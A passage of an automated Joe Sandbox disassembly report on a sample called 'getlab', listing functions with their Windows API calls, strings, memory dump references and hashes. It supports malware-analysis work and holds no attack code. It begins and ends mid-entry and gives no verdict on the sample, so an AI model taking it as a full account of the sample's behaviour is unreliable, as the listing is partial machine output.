                                                                            • Part of subcall function 004242BC: SetWindowTextA.USER32(?,00000000), ref: 004242D4
                                                                          • ShowWindow.USER32(?,00000005,00000000,004974CD,?,?,00000000), ref: 0049729E
                                                                            • Part of subcall function 0042D8BC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8CF
                                                                            • Part of subcall function 00407298: SetCurrentDirectoryA.KERNEL32(00000000,?,004972C6,00000000,00497499,?,?,00000005,00000000,004974CD,?,?,00000000), ref: 004072A3
                                                                            • Part of subcall function 0042D444: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4D2,?,?,?,00000001,?,00456052,00000000,004560BA), ref: 0042D479
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                          • String ID: .dat$.msg$IMsg$Uninstall
                                                                          • API String ID: 3312786188-1660910688
                                                                          • Opcode ID: fee9eccc106b75620d129768861d1a7621c8bfd9450b5e9a776089888b3099eb
                                                                          • Instruction ID: 502499af6c4fed57a8803849289841afdffa1b87ef326e8d9c35a034d288349d
                                                                          • Opcode Fuzzy Hash: fee9eccc106b75620d129768861d1a7621c8bfd9450b5e9a776089888b3099eb
                                                                          • Instruction Fuzzy Hash: 20317574A10214AFCB01EF65DC92D5E7BB5FB88318B51847AF800AB792D739BD05CB58
                                                                          Function 0042EAA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EAD2
                                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EAD8
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042EB01
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressByteCharHandleModuleMultiProcWide
                                                                          • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                          • API String ID: 828529508-2866557904
                                                                          • Opcode ID: f0f9c1c29cdcfbee2e7a8f4e336c776c41a61f3b4eee9e965eb88e8c498f29e0
                                                                          • Instruction ID: 08d6e73c43f4c72d4bf81f88f5f107f4332e42bd1359b104b354d246f0006fb7
                                                                          • Opcode Fuzzy Hash: f0f9c1c29cdcfbee2e7a8f4e336c776c41a61f3b4eee9e965eb88e8c498f29e0
                                                                          • Instruction Fuzzy Hash: 14F0F6D034062237E620B6BFAC82F7B59CC8F9472AF140036F109EB2C2E96C9905427F
                                                                          Function 004019CC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,021B7B44,000012B0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                          • RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,021B7B44,000012B0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                          • LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,021B7B44,000012B0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                          • RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,021B7B44,000012B0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                          • String ID: =Y
                                                                          • API String ID: 730355536-2624468338
                                                                          • Opcode ID: 0971dfa849a4ffc4cae04a3e1ff9e59bd0eaa306d87ad714f1f0155365df5b79
                                                                          • Instruction ID: 91310e2de28581c92a9b529d79901d52005bdf0b1253609ef7109df0d78d257f
                                                                          • Opcode Fuzzy Hash: 0971dfa849a4ffc4cae04a3e1ff9e59bd0eaa306d87ad714f1f0155365df5b79
                                                                          • Instruction Fuzzy Hash: D001A1706482409EE719AB69BA467253FD4D795B48F11803BF840A6BF3C77C4440EBAD
                                                                          Function 00457E18 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00457E48
                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00457E69
                                                                          • CloseHandle.KERNEL32(?,00457E9C), ref: 00457E8F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                          • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                          • API String ID: 2573145106-3235461205
                                                                          • Opcode ID: fd83349507a0981e80b71893faadad776893e27a60c3cb1bdbbb378314d18f26
                                                                          • Instruction ID: 364c7453444e38e17299d149b0285d9f966ded63b706bec2a35302b816cfa9f1
                                                                          • Opcode Fuzzy Hash: fd83349507a0981e80b71893faadad776893e27a60c3cb1bdbbb378314d18f26
                                                                          • Instruction Fuzzy Hash: 88018F71608304AFD711EBA99D03A2E73A9EB49715F6040B6FC10E72D3DA389D048619
                                                                          Function 0042E9A4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA68,00000004,00499934,00457011,004573B4,00456F68,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9BA
                                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C0
                                                                          • InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressExchangeHandleInterlockedModuleProc
                                                                          • String ID: ChangeWindowMessageFilter$user32.dll
                                                                          • API String ID: 3478007392-2498399450
                                                                          • Opcode ID: e1b8650f68b4f5373240c16350828cc36d4525f286b48015e4a1be8ef0f4b549
                                                                          • Instruction ID: 012688e8468ec3177747178b84a01981fc81215c8fc8f9e453d059575ed0bd59
                                                                          • Opcode Fuzzy Hash: e1b8650f68b4f5373240c16350828cc36d4525f286b48015e4a1be8ef0f4b549
                                                                          • Instruction Fuzzy Hash: B5E0ECA1740314EAEA203B66BE8AF573558E724B19F54003BF100A51F2C7BC1C80CA9E
                                                                          Function 00477628 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderthreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 00477630
                                                                          • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477727,0049C0A4,00000000), ref: 00477643
                                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477649
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProcProcessThreadWindow
                                                                          • String ID: AllowSetForegroundWindow$user32.dll
                                                                          • API String ID: 1782028327-3855017861
                                                                          • Opcode ID: f9c0aa6575de5325031961dc8c28253599d1abb86677e5186b48b355b3ec359b
                                                                          • Instruction ID: 000833d094a070652a329d30f0dc0cedfc4963abb7563544beb27e38e0473342
                                                                          • Opcode Fuzzy Hash: f9c0aa6575de5325031961dc8c28253599d1abb86677e5186b48b355b3ec359b
                                                                          • Instruction Fuzzy Hash: 8DD05E90249B02A9D90073B94C46F6F224C8A90B68790843B7408F218ECA3CDC00AA3C
                                                                          Function 00416C24 Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • BeginPaint.USER32(00000000,?), ref: 00416C4A
                                                                          • SaveDC.GDI32(?), ref: 00416C7B
                                                                          • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D3D), ref: 00416CDC
                                                                          • RestoreDC.GDI32(?,?), ref: 00416D03
                                                                          • EndPaint.USER32(00000000,?,00416D44,00000000,00416D3D), ref: 00416D37
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                          • String ID:
                                                                          • API String ID: 3808407030-0
                                                                          • Opcode ID: b6c8991bbe38a25b063fe02cbbd384aaa1ab048ef0fa4b5957116aa5db27c33c
                                                                          • Instruction ID: a024d51d8e1917fcb77b8775c892227abb36bb6ea51d3f2ecd71d44c14df9e09
                                                                          • Opcode Fuzzy Hash: b6c8991bbe38a25b063fe02cbbd384aaa1ab048ef0fa4b5957116aa5db27c33c
                                                                          • Instruction Fuzzy Hash: 90414170A04244AFCB04DBA9C595FAA77F5FF48304F1640AAE8459B362D778DD81CF54
                                                                          Function 004147F8 Relevance: 7.6, APIs: 5, Instructions: 102COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 76268f3067fd7e5b2c462dbffcea77bb187ec6f22ea95bd0c2474c45d8462d54
                                                                          • Instruction ID: 35d93ad14ebc553eed2a21e9b47c67a907fa477780373b58b871235641bd8dc8
                                                                          • Opcode Fuzzy Hash: 76268f3067fd7e5b2c462dbffcea77bb187ec6f22ea95bd0c2474c45d8462d54
                                                                          • Instruction Fuzzy Hash: B23132746057409FC320EB69C584BABB7E8AF89714F04891EF9D9C7751C638EC818B19
                                                                          Function 004297C4 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429800
                                                                          • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 0042982F
                                                                          • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 0042984B
                                                                          • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 00429876
                                                                          • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 00429894
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID:
                                                                          • API String ID: 3850602802-0
                                                                          • Opcode ID: 9f4218a80dfb6ea41a935cea72b52cc504d621f6de5a3555e5000c6e6653befd
                                                                          • Instruction ID: c6a16a7b88e0b18788f8573a4e1e1ff521d0234e697c82a38616540cbd285451
                                                                          • Opcode Fuzzy Hash: 9f4218a80dfb6ea41a935cea72b52cc504d621f6de5a3555e5000c6e6653befd
                                                                          • Instruction Fuzzy Hash: 0621AF707507057AE710FB67DC82F8B7AECDB41708F54483EB905AB6D2DBB8AD418618
                                                                          Function 0041BBB0 Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetSystemMetrics.USER32(0000000B), ref: 0041BBC2
                                                                          • GetSystemMetrics.USER32(0000000C), ref: 0041BBCC
                                                                          • 73A1A570.USER32(00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC0A
                                                                          • 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BD75,?,00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC51
                                                                          • DeleteObject.GDI32(00000000), ref: 0041BC92
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: MetricsSystem$A26310A570DeleteObject
                                                                          • String ID:
                                                                          • API String ID: 4277397052-0
                                                                          • Opcode ID: e18963905fbda8c1d4957780915d0687961bfe8337bc9852c69d647676f2e28b
                                                                          • Instruction ID: 58bffdd5ee351b83518612b46dbf543796c6efca4902a0296a584a1adfede215
                                                                          • Opcode Fuzzy Hash: e18963905fbda8c1d4957780915d0687961bfe8337bc9852c69d647676f2e28b
                                                                          • Instruction Fuzzy Hash: E2317F70E00208EFDB04DFA5C942AAEB7F5EB48704F21856AF514EB381D7789E80DB95
                                                                          Function 004733C0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 71COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0045CE6C: SetLastError.KERNEL32(00000057,00000000,0045CF38,?,?,?,?,00000000), ref: 0045CED7
                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,00473494,?,?,0049C1D0,00000000), ref: 0047344D
                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,00473494,?,?,0049C1D0,00000000), ref: 00473463
                                                                          Strings
                                                                          • Failed to set permissions on registry key (%d)., xrefs: 00473474
                                                                          • Could not set permissions on the registry key because it currently does not exist., xrefs: 00473457
                                                                          • Setting permissions on registry key: %s\%s, xrefs: 00473412
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                                          • API String ID: 1452528299-4018462623
                                                                          • Opcode ID: c2b4e85895e31eb7a4579faef75fdd198930d34150e3eae1e6804dec0b8ec56e
                                                                          • Instruction ID: 1dcd38469e34a8f7cdaf58011d69bd772563d378ec45d4c1a9cd481a7780d06e
                                                                          • Opcode Fuzzy Hash: c2b4e85895e31eb7a4579faef75fdd198930d34150e3eae1e6804dec0b8ec56e
                                                                          • Instruction Fuzzy Hash: 9221B370A042445FCB05DFAAC8816EEBBE8DF49319F50817AE448E7392D77C5E058BAD
                                                                          Function 00403CA4 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                          • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                                          • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide$AllocString
                                                                          • String ID:
                                                                          • API String ID: 262959230-0
                                                                          • Opcode ID: fdbd74c082f9815823b504bab77549cef434610d295dd08879ffad668e8b5e0c
                                                                          • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                                          • Opcode Fuzzy Hash: fdbd74c082f9815823b504bab77549cef434610d295dd08879ffad668e8b5e0c
                                                                          • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                                          Function 004143D8 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • 73A18830.GDI32(00000000,00000000,00000000), ref: 00414411
                                                                          • 73A122A0.GDI32(00000000,00000000,00000000,00000000), ref: 00414419
                                                                          • 73A18830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041442D
                                                                          • 73A122A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414433
                                                                          • 73A1A480.USER32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041443E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: A122A18830$A480
                                                                          • String ID:
                                                                          • API String ID: 3325508737-0
                                                                          • Opcode ID: 2e378a44b9d760f9e5f1bf7c9b236df4e5f96ed4aa47b9fb48d5ba9b1bbdbb58
                                                                          • Instruction ID: 53d1df8a90047df028643ee63be254e951aa3f987763a81c259c8cb4a1af4cbb
                                                                          • Opcode Fuzzy Hash: 2e378a44b9d760f9e5f1bf7c9b236df4e5f96ed4aa47b9fb48d5ba9b1bbdbb58
                                                                          • Instruction Fuzzy Hash: 7101D43520C3806AE600A63D8C85A9F6BDD9FC6314F05446EF484DB282C979C801C761
                                                                          Function 00424CD8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 190COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0041F06C: GetActiveWindow.USER32 ref: 0041F06F
                                                                            • Part of subcall function 0041F06C: GetCurrentThreadId.KERNEL32 ref: 0041F084
                                                                            • Part of subcall function 0041F06C: 73A25940.USER32(00000000,Function_0001F048), ref: 0041F08A
                                                                            • Part of subcall function 004231A0: GetSystemMetrics.USER32(00000000), ref: 004231A2
                                                                          • OffsetRect.USER32(?,?,?), ref: 00424DC1
                                                                          • DrawTextA.USER32(00000000,00000000,000000FF,?,00000C10), ref: 00424E84
                                                                          • OffsetRect.USER32(?,?,?), ref: 00424E95
                                                                            • Part of subcall function 0042355C: GetCurrentThreadId.KERNEL32 ref: 00423571
                                                                            • Part of subcall function 0042355C: SetWindowsHookExA.USER32(00000003,00423518,00000000,00000000), ref: 00423581
                                                                            • Part of subcall function 0042355C: CreateThread.KERNEL32(00000000,000003E8,004234C8,00000000,00000000), ref: 004235A5
                                                                            • Part of subcall function 00424B24: SetTimer.USER32(00000000,00000001,?,004234AC), ref: 00424B3F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$CurrentOffsetRect$A25940ActiveCreateDrawHookMetricsSystemTextTimerWindowWindows
                                                                          • String ID: nLB
                                                                          • API String ID: 1906964682-2031493005
                                                                          • Opcode ID: d69f4dabb7a698d4e2161d5678524c276ca36ddb1998852898fe681b10175c4d
                                                                          • Instruction ID: 6ccba84303d4583ac65c185f09da03f8435108134aba783506c2f58cc8f90ba1
                                                                          • Opcode Fuzzy Hash: d69f4dabb7a698d4e2161d5678524c276ca36ddb1998852898fe681b10175c4d
                                                                          • Instruction Fuzzy Hash: A7812871A00218CFDB14DFA8D884ADEBBF4FF88314F51416AE905AB296E778AD45CF44
                                                                          Function 00406F94 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 156shareCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 00406FF3
                                                                          • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 0040706D
                                                                          • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070C5
                                                                          Strings
                                                                          Memory Dump Source
